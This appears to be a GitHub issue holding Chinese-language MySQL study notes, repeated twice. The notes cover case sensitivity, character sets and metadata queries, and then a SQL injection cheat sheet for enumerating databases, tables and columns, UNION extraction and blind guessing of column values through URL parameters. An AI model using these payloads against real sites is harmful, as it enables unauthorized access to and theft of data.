You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Database and table names are case sensitive
库名和表名大小写敏感
表的别名是严格区分大小写的
列名与列的别名在所有的情况下均是大小写不敏感
字段内容默认情况下是大小写不敏感的[ 具体看排序规则吧 ]
使用mysql 的BINARY 关键字使搜索区分大小写 select * from tb_user where BINARY username ='user';
char set 和 collation
字符集 和 排序规则[ 跟编码 + 数据提取大小写等等有关 ]
客户端乱码排错小思路
show variables like '%char%';
MySQL命令行控制台/shell设置通讯编码[ 官方描述那个工具叫做 Welcome to the MySQL monitor ]
mysql --default-character-set=utf8 -u root -p
查看数据库/表的信息
show table status from information_schema like 'TABLES'; [大小写敏感]
show create database information_schema;
show create table test;
show full columns from table_name;
↑返回结果包括↓ [Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment]
低端注入流程
get库名,用户 select database() select user()
get表名 select table_name from information_schema.tables where table_schema='table_name' # select *** from *** where ****=** and 0 <= (select COUNT(*) from table_name ) # select *** from *** where ****=** and exists ( select * from table_name ) #
get字段名 select column_name from information_schema.columns where table_name='table_name'
***** union (select table_name, column_name, 1 from information_schema.columns where table_name='secret_table');#
开搞
遇到纯数字的字段名记得用反单引号围起来[tab键上面]
select `1` from table_name;
The text was updated successfully, but these errors were encountered:
猜解表名:http://www.XX.com/index.asp?id=1 and exists select * from 猜测的表名
猜解列名:http://www.XX.com/index.asp?id=1 and exists select 猜测的列名 from 已知表名
猜测列长度:http://www.XX.com/index.asp?id=1 and select top 1 len(已知列名) from admin>猜测的值长度 如5
//TOP 子句用于规定要返回的记录的数目。
//LEN 函数返回文本字段中值的长度。
猜测具体值:http://www.XX.com/index.asp?id=1 and select top 1 asc(mid(列名,列数,1)) from admin> 猜测的ascll码 如97
//mid(列名,行数,N)截取第N位字符
//asc()将字符转换为ascll码
太久没玩这个,突然失忆
同理,开始随记,开始回忆
百度百度 + 谷歌谷歌 + 博客园 + CSDN + 。。。
函数
user()
database()
updatexml()
extractvalue()
*extract 提取
concat
变量
@@version
语句
exists
union
join
大小写敏感[Linux]
Database and table names are case sensitive
库名和表名大小写敏感
表的别名是严格区分大小写的
列名与列的别名在所有的情况下均是大小写不敏感
字段内容默认情况下是大小写不敏感的[ 具体看排序规则吧 ]
使用mysql 的BINARY 关键字使搜索区分大小写 select * from tb_user where BINARY username ='user';
char set 和 collation
字符集 和 排序规则[ 跟编码 + 数据提取大小写等等有关 ]
客户端乱码排错小思路
show variables like '%char%';
MySQL命令行控制台/shell设置通讯编码[ 官方描述那个工具叫做 Welcome to the MySQL monitor ]
mysql --default-character-set=utf8 -u root -p
查看数据库/表的信息
show table status from information_schema like 'TABLES'; [大小写敏感]
show create database information_schema;
show create table test;
show full columns from table_name;
↑返回结果包括↓
[Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment]
低端注入流程
get库名,用户
select database()
select user()
get表名
select table_name from information_schema.tables where table_schema='table_name' #
select *** from *** where ****=** and 0 <= (select COUNT(*) from table_name ) #
select *** from *** where ****=** and exists ( select * from table_name ) #
get字段名
select column_name from information_schema.columns where table_name='table_name'
***** union (select table_name, column_name, 1 from information_schema.columns where table_name='secret_table');#
开搞
遇到纯数字的字段名记得用反单引号围起来[tab键上面]
select `1` from table_name;
The text was updated successfully, but these errors were encountered: